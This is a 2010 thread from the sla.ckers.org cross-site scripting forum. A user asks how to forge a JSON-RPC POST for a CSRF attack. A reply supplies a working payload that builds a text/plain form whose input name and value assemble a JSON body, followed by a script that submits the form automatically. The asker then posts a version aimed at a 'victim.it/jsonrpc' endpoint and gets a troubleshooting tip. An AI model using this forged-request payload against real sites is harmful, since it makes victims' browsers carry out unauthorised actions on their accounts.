Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Help sending json object
Posted by: acemutha
Date: January 13, 2010 10:42AM

Hi all I know very little about json and I'd like you to ask if it's possible to replay a json post request like:

{id:8,method:"contentBridge.setComponentValue",params:["7.92998", "name", "Welcome", "", {"javaClass": "java.util.HashMap", "map": {"en": false, "es": false, "de": false, "fr": false}}]}

the aim would be to try a csrf attack.
I thought about jsonrequest.post but actually I don't know how.

Thanks in advance

Options: ReplyQuote
Re: Help sending json object
Posted by: sirdarckcat
Date: January 13, 2010 09:11PM

yes it is possible
<form type="text/plain">
<input name='{x:"' value='",id:8,method:"contentBridge.setComponentValue",params:["7.92998", "name", "Welcome", "", {"javaClass": "java.util.HashMap", "map": {"en": false, "es": false, "de": false, "fr": false}}]}'>
</form>
<script>document.forms[0].submit()</script>

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Help sending json object
Posted by: acemutha
Date: January 14, 2010 03:58AM

Thanks for the answer but I slightly modified it to suit my needs to test it avoiding auto-submit like this:

<form type="text/plain" method="post" action="http://victim.it/jsonrpc">
<input name='{x:"'value='",id:8,method:"contentBridge.setComponentValue",params:["7.92998","name", "Welcome", "", {"javaClass": "java.util.HashMap", "map": {"en":false, "es":+false, "de":+false, "fr":+false}}]}'>
<input type="submit" value="INVIA"/>
</form>

BUT...
It asks me to download the file jsonrpc.
Any clues??



Edited 1 time(s). Last edit at 01/14/2010 04:13AM by acemutha.

Options: ReplyQuote
Re: Help sending json object
Posted by: sirdarckcat
Date: January 14, 2010 04:55AM

try to post to view-source, I've never tried, but may work

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote


Sorry, only registered users may post in this forum.